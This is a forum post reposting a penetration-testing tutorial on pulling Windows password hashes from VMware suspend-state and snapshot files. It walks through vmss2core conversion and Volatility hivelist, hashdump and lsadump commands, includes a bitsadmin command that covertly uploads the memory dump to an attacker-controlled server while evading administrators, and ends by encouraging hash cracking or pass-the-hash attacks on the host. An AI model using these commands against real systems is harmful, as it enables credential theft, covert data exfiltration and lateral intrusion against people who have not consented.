alien Posted September 24, 2012 Report Posted September 24, 2012 The first step is to convert the VMware "Snapshots" or "Suspend States" into a memory dump. Then, you can use the volatility memory analysis tool to dump the hashes from the memory dump. Let's see how!Converting the VMware memory files to a memory dump is pretty simple with the "vmss2core" utility that is distributed with VMware. On a Windows host you can find this utility under "C:\Program Files\VMware\VMware Workstation" or on a Mac OS X host you can find it under "/Library/Application Support/VMware Fusion".Side Note: If your target is running Microsoft Hyper-V, you can probably use vm2dmp to do the same thing. I haven't tried it, so you can be adventurous and give it a spin. The tool can be found here.The syntax for vmss2code is "vmss2core -W "If you look at the list of files in a virtual machine directory you will see several .vmem files and either a .vmss or a .vmsn file for each of the .vmem files. Here is a directory listing on VM Fusion.MarkMac-2:Windows7.vmwarevm markbaggett$ ls *.vmemWindows7-Snapshot1.vmem Windows7-Snapshot2.vmemWindows7-Snapshot10.vmem Windows7.vmemMarkMac-2:Windows7.vmwarevm markbaggett$ ls *.vmssWindows7.vmssMarkMac-2:Windows7.vmwarevm markbaggett$ ls *.vmsnWindows7-Snapshot1.vmsn Windows7-Snapshot2.vmsnWindows7-Snapshot10.vmsnThe .vmss files are "Suspend States" and are created when the virtual machines are paused. The .vmsn files are created when a snapshot is taken. Vmss2core will combine these files into a Windows Memory Core Dump with a filename of "memory.dmp". If you want to analyze each of the snapshots and the suspended state, you can dump each of them one at a time and rename memory.dmp accordingly.$ /Library/Application\ Support/VMware\ Fusion/vmss2core -W Windows7.vmss Windows7.vmem$ mv memory.dmp Win7-suspendstate.dmp$ /Library/Application\ Support/VMware\ Fusion/vmss2core -W Windows7-Snapshot1.vmsn Windows7-Snapshot1.vmem$ mv memory.dmp Win7-Snapshot1.dmp Here is what it looks like when you dump the suspend state:In addition to the grabbing the memory.dmp file, you will also want to take note of the OS Version that is identified by the vmss2core utility. In this example, it says we are running Windows 7 SP1.Next we need to get the memory image from the host back to our machine for analysis. This potentially very large file will require some time and bandwidth to transfer. If you need to transfer it without catching the attention of the system administrators, you could use the bitsadmin utility to upload the file to an IIS server that you control with the BITS extension installed, using the following command:C:\> bitsadmin /transfer jobnamehere /upload /priority low https://myIISserver.com/memory.dmp memory.dmp [/codeNow, it is just a matter of dumping the hashes from the memory dump. You can use Volatility 2.0 or greater to dump the hashes. First, you'll need to know the name of the "OS Profile" of the memory dump. You get this information by issuing the command:[code]$ python vol.py imageinfo -f ~/memory.dmp Once you have the name of your image profile, cross reference that to the information displayed by vmss2core so you know what OS you are targeting. I've found that vmss2core is usually more specific than image info. You will need the profile name when you run the "hivelist" plug-in which will give the memory offsets of the different registry hives.$ python vol.py hivelist -f ~/memory.dmp --profile=Win7SP1x86 Next take the Virtual Memory offsets of the \REGISTERY\MACHINE\SYSTEM and \SystemRoot\System32\Config\SAM hives and pass those to Volatility's "hashdump" plug-in. The syntax is:$ python vol.py hashdump -f ~/memory.dmp --profile= --sys-offset= --sam-offset= There! Now you have all the hashes from the VMware Guest machine. While you are at it, you can also use the "lsadump" plug-in to dump LSA Secrets passwords from memory. The LSADUMP plug in will require the offsets of the SYSTEM and SECURITY hives rather than SYSTEM and SAM. Armed with a new list of passwords, you are ready to attack the host. You can crack them or use them in a pass-the-hash attack against the host. Have fun!Source: Pen Test Privilege Escalation Through Suspended Virtual Machines Quote
